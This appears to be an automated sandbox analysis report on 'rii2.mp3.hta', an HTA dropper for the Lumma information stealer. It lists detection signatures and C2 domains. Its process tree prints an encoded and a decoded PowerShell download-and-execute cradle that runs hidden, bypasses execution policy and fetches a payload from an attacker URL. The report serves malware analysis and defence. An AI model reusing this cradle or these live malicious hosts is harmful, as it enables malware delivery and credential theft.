Edit tour
Windows
Analysis Report
rii2.mp3.hta
Overview
General Information
| Sample name: | rii2.mp3.hta |
| Analysis ID: | 1589497 |
| MD5: | a181e4f186f156cbb238984f8a5bf4e6 |
| SHA1: | 58c4adc3d4a848ae10bc29cf97dc5a70efa4c939 |
| SHA256: | 007969cf64583d251ed63eda2c365f6cbfd768f37d05e699415d166021b3e294 |
| Tags: | htauser-aachum |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 2084 cmdline: mshta.exe "C:\Users\ user\Deskt op\rii2.mp 3.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 6536 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -Enc UwB0AGEAcg B0AC0AUABy AG8AYwBlAH MAcwAgACIA QwA6AFwAVw BpAG4AZABv AHcAcwBcAF MAeQBzAFcA bwB3ADYANA BcAFcAaQBu AGQAbwB3AH MAUABvAHcA ZQByAFMAaA BlAGwAbABc AHYAMQAuAD AAXABwAG8A dwBlAHIAcw BoAGUAbABs AC4AZQB4AG UAIgAgAC0A QQByAGcAdQ BtAGUAbgB0 AEwAaQBzAH QAIAAiAC0A dwAgAGgAaQ BkAGQAZQBu ACAALQBlAH AAIABiAHkA cABhAHMAcw AgAC0AbgBv AHAAIAAtAE MAbwBtAG0A YQBuAGQAIA BgACIAaQBl AHgAIAAoAC gATgBlAHcA LQBPAGIAag BlAGMAdAAg AFMAeQBzAH QAZQBtAC4A TgBlAHQALg BXAGUAYgBD AGwAaQBlAG 4AdAApAC4A RABvAHcAbg BsAG8AYQBk AFMAdAByAG kAbgBnACgA JwBoAHQAdA BwAHMAOgAv AC8AaAAyAC 4AZQByAHIA YQBuAHQAcg BlAGYAcgBh AGkAbgB1AG 4AZABvAGMA awBlAGQALg BzAGgAbwBw AC8AcgBpAG kAMgAuAGYA aQBsAGUAJw ApACkAYAAi ACIAIAAtAF cAaQBuAGQA bwB3AFMAdA B5AGwAZQAg AEgAaQBkAG QAZQBuAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 6492 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3548 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand "iex ((New-Obje ct System. Net.WebCli ent).Downl oadString( 'https://h 2.errantre frainundoc ked.shop/r ii2.file') )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
dllhost.exe (PID: 2792 cmdline: C:\Windows \system32\ DllHost.ex e /Process id:{F97175 07-6651-4E DB-BFF7-AE 615179BCCF } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - powershell.exe (PID: 2792 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["punishzement.biz", "truculengisau.biz", "spookycappy.biz", "marketlumpe.biz", "fraggielek.biz", "littlenotii.biz", "nuttyshopr.biz", "degreehourz.click", "grandiouseziu.biz"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||